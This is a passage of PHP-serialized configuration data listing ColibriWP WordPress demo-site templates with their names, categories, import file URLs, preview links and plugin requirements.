09:02:40.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:35;a:11:{s:16:\"import_file_name\";s:8:\"Aquarium\";s:4:\"slug\";s:8:\"aquarium\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aquarium/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aquarium/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aquarium/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/aquarium/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/aquarium/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:36;a:11:{s:16:\"import_file_name\";s:4:\"Auto\";s:4:\"slug\";s:4:\"auto\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/auto/content.xml\";s:22:\"import_widget_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/auto/widgets.wie\";s:26:\"import_customizer_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/auto/customizer.dat\";s:24:\"import_preview_image_url\";s:70:\"https://static.colibriwp.com/templates-screenshots/auto/screenshot.png\";s:11:\"preview_url\";s:42:\"https://colibriwp-work.colibriwp.com/auto/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:37;a:11:{s:16:\"import_file_name\";s:10:\"Business V\";s:4:\"slug\";s:10:\"business-v\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-v/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-v/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-v/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/business-v/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/business-v/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:38;a:11:{s:16:\"import_file_name\";s:7:\"Charity\";s:4:\"slug\";s:7:\"charity\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/charity/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/charity/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/charity/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/charity/screenshot.png\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/charity/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:39;a:11:{s:16:\"import_file_name\";s:13:\"Makeup Artist\";s:4:\"slug\";s:13:\"makeup-artist\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/makeup-artist/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/makeup-artist/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/makeup-artist/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/makeup-artist/screenshot.png\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/makeup-artist/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:50.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:40;a:11:{s:16:\"import_file_name\";s:10:\"Mobile App\";s:4:\"slug\";s:10:\"mobile-app\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/mobile-app/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/mobile-app/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/mobile-app/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/mobile-app/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/mobile-app/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:51.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:41;a:11:{s:16:\"import_file_name\";s:12:\"Music Artist\";s:4:\"slug\";s:12:\"music-artist\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/music-artist/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/music-artist/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/music-artist/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/music-artist/screenshot.png\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/music-artist/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:53.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:42;a:11:{s:16:\"import_file_name\";s:22:\"Photographer Portfolio\";s:4:\"slug\";s:22:\"photographer-portfolio\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/photographer-portfolio/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/photographer-portfolio/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/photographer-portfolio/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/photographer-portfolio/screenshot.png\";s:11:\"preview_url\";s:60:\"https://colibriwp-work.colibriwp.com/photographer-portfolio/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:54.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:43;a:11:{s:16:\"import_file_name\";s:6:\"Resort\";s:4:\"slug\";s:6:\"resort\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/resort/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/resort/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/resort/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/resort/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/resort/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:56.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:44;a:11:{s:16:\"import_file_name\";s:6:\"Tailor\";s:4:\"slug\";s:6:\"tailor\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tailor/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tailor/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tailor/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/tailor/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/tailor/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:58.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:45;a:11:{s:16:\"import_file_name\";s:7:\"Theater\";s:4:\"slug\";s:7:\"theater\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/theater/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/theater/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/theater/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/theater/screenshot.png\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/theater/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:59.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:46;a:11:{s:16:\"import_file_name\";s:13:\"Travel Agency\";s:4:\"slug\";s:13:\"travel-agency\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/travel-agency/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/travel-agency/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/travel-agency/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/travel-agency/screenshot.png\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/travel-agency/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:03:01.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:47;a:11:{s:16:\"import_file_name\";s:6:\"Bakery\";s:4:\"slug\";s:6:\"bakery\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bakery/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bakery/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bakery/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-53/screenshot.jpg\";s:11:\"preview_url\";s:43:\"https://colibriwp-work.colibriwp.com/bakery\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:48;a:11:{s:16:\"import_file_name\";s:16:\"Cleaning Company\";s:4:\"slug\";s:16:\"cleaning-company\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/cleaning-company/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/cleaning-company/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/cleaning-company/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-54/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/cleaning-company\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:14.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:49;a:11:{s:16:\"import_file_name\";s:15:\"Summer Festival\";s:4:\"slug\";s:15:\"summer-festival\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/summer-festival/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/summer-festival/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/summer-festival/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/summer-festival/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/summer-festival/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:52.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:50;a:11:{s:16:\"import_file_name\";s:12:\"Dance Studio\";s:4:\"slug\";s:12:\"dance-studio\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/dance-studio/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/dance-studio/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/dance-studio/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/dance-studio/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/dance-studio/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:56.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:51;a:11:{s:16:\"import_file_name\";s:9:\"Gardening\";s:4:\"slug\";s:9:\"gardening\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gardening/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gardening/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gardening/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/gardening/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/gardening/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:00.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:52;a:11:{s:16:\"import_file_name\";s:19:\"Political Candidate\";s:4:\"slug\";s:19:\"political-candidate\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/political-candidate/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/political-candidate/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/political-candidate/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/political-candidate/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/political-candidate/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:04.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:53;a:11:{s:16:\"import_file_name\";s:19:\"Horse Riding Center\";s:4:\"slug\";s:19:\"horse-riding-center\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/horse-riding-center/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/horse-riding-center/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/horse-riding-center/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/horse-riding-center/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/horse-riding-center/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:08.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:54;a:11:{s:16:\"import_file_name\";s:9:\"School II\";s:4:\"slug\";s:9:\"school-ii\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school-ii/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/school-ii/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/school-ii/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:13.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:55;a:11:{s:16:\"import_file_name\";s:13:\"Therapist PRO\";s:4:\"slug\";s:13:\"therapist-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/therapist-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/therapist-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/therapist-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/therapist-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/therapist-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:59.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:56;a:11:{s:16:\"import_file_name\";s:10:\"Museum PRO\";s:4:\"slug\";s:10:\"museum-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/museum-pro/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/museum-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/museum-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/museum-pro/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/museum-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:55.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:57;a:11:{s:16:\"import_file_name\";s:7:\"Eco PRO\";s:4:\"slug\";s:7:\"eco-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eco-pro/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eco-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eco-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/eco-pro/screenshot.jpg\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/eco-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:53.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:58;a:11:{s:16:\"import_file_name\";s:13:\"Carpentry PRO\";s:4:\"slug\";s:13:\"carpentry-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/carpentry-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/carpentry-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/carpentry-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-74/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/carpentry-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:51.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:59;a:11:{s:16:\"import_file_name\";s:15:\"Babysitting PRO\";s:4:\"slug\";s:15:\"babysitting-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/babysitting-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/babysitting-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/babysitting-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/babysitting-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/babysitting-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:50.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:60;a:11:{s:16:\"import_file_name\";s:15:\"Bike rental PRO\";s:4:\"slug\";s:15:\"bike-rental-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bike-rental-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bike-rental-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bike-rental-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/bike-rental-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/bike-rental-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:61;a:11:{s:16:\"import_file_name\";s:8:\"City PRO\";s:4:\"slug\";s:8:\"city-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/city-pro/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/city-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/city-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/city-pro/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/city-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:62;a:11:{s:16:\"import_file_name\";s:12:\"Handyman 